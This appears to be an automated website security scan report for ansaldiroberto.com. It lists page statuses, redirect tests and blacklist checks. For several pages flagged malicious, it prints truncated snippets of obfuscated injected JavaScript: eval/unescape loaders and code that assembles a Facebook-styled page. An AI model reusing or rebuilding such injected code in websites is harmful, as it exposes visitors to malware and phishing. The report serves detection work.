Scanned pages/files
Request | Server response | Status |
http://ansaldiroberto.com/ | 200 OK Content-Length: 1865 Content-Type: text/html | clean |
http://ansaldiroberto.com/aligocydi.html | 200 OK Content-Length: 321 Content-Type: text/html | clean |
http://ansaldiroberto.com/test404page.js | 404 Not Found Content-Length: 518 Content-Type: text/html | clean |
http://ansaldiroberto.com/amlopres-z.html | 200 OK Content-Length: 44806 Content-Type: text/html | clean |
http://afterpill.ru/js/jquery.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://ansaldiroberto.com/atrovent.html | 403 Forbidden Content-Length: 521 Content-Type: text/html | clean |
http://ansaldiroberto.com/aviny.html | 200 OK Content-Length: 259 Content-Type: text/html | clean |
http://ansaldiroberto.com/cgi-bin/ | 403 Forbidden Content-Length: 516 Content-Type: text/html | clean |
http://ansaldiroberto.com/chrystal.html | 200 OK Content-Length: 11771 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('f%75nction%20n%39%37%51%42\125%20%20%20%20%28\165\113%34%6A\150\120Ga%36M%32%6CdH%31%29%7Br%34%30%32%35%6A\113%6A\126\123j\143%3D\165%4B%34\152h\120Ga%36M%32%6Cd\110%31%7D%3B'));rnNhBrLtGtlNy='l' ;cjX6ODk+='p7uK6vc4zv2Adhe' ;p2oWy1B[0]+='l*mv,p,q{li{u8tUyMyOyQrxFv~EyjtAdzOqGys[tzY1[pm,qsnxecwlRkeR|Hy8s3lSyee~Wv`w`u~Fw3kqv(vYx\njk1lwlyx+j|eoO(u~f,vu7xj/tSjs~kTj7z%~j:j<q|irw5k.wzvj/pO{v~k,lpk9j9jjOj?vvjSj2k3j4jujExfjYj;v~ Antivirus reports:
| ||
http://ansaldiroberto.com/corrianne.html | 200 OK Content-Length: 14046 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var e9f76ca=true;ll1=document.layers;lll=window.sidebar;e9f76ca=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');e9f76ca|=lII;yjg5B2Gd4otRlP7=new Array();yjg5B2Gd4otRlP7[0]='%76c\162%49A%35%33';huI9pdwT48S2Nc9=new Array();huI9pdwT48S2Nc9[0]=' <html lang="en" id~facebook~c~ss~no_js">~ead~(s Antivirus reports:
| ||
http://ansaldiroberto.com/crystal.html | 200 OK Content-Length: 14011 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var e9f76ca=true;ll1=document.layers;lll=window.sidebar;e9f76ca=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');e9f76ca|=lII;xw7HCAhli6VNp7I=new Array();xw7HCAhli6VNp7I[0]='%69%33%30%67%35\151%34';fzF7d6Ka7374m4S=new Array();fzF7d6Ka7374m4S[0]=' <html lang="en" id~facebook~c~ss~no_js">~ead Antivirus reports:
| ||
http://ansaldiroberto.com/danell.html | 200 OK Content-Length: 13997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var e87e9f=true;ll1=document.layers;lll=window.sidebar;e87e9f=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');e87e9f|=lII;jXLFSm2G=new Array();tWyBkJgi=new Array();tWyBkJgi[0]='\145%38%48D%33I%34%31%35' ;jXLFSm2G[0]=' <html lang="en" id~facebook~c~ss~no_js">~ead~(script>eval Antivirus reports:
| ||
http://ansaldiroberto.com/diane.html | 200 OK Content-Length: 13997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var e87e9f=true;ll1=document.layers;lll=window.sidebar;e87e9f=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');e87e9f|=lII;jXLFSm2G=new Array();tWyBkJgi=new Array();tWyBkJgi[0]='\145%38%48D%33I%34%31%35' ;jXLFSm2G[0]=' <html lang="en" id~facebook~c~ss~no_js">~ead~(script>eval Antivirus reports:
| ||
http://ansaldiroberto.com/egohify.html | 200 OK Content-Length: 281 Content-Type: text/html | clean |
http://ansaldiroberto.com/inabedyna.html | 200 OK Content-Length: 227 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ansaldiroberto.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 07:25:38 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 1865
Content-Type: text/html;charset=ISO-8859-1
...1865 bytes of data.
GET / HTTP/1.1
Host: ansaldiroberto.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 07:25:38 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 1865
Content-Type: text/html;charset=ISO-8859-1
...1865 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ansaldiroberto.com
Referer: http://www.google.com/search?q=ansaldiroberto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ansaldiroberto.com
Referer: http://www.google.com/search?q=ansaldiroberto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ansaldiroberto.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ansaldiroberto.com/
Result: ansaldiroberto.com is not infected or malware details are not published yet.
Result: ansaldiroberto.com is not infected or malware details are not published yet.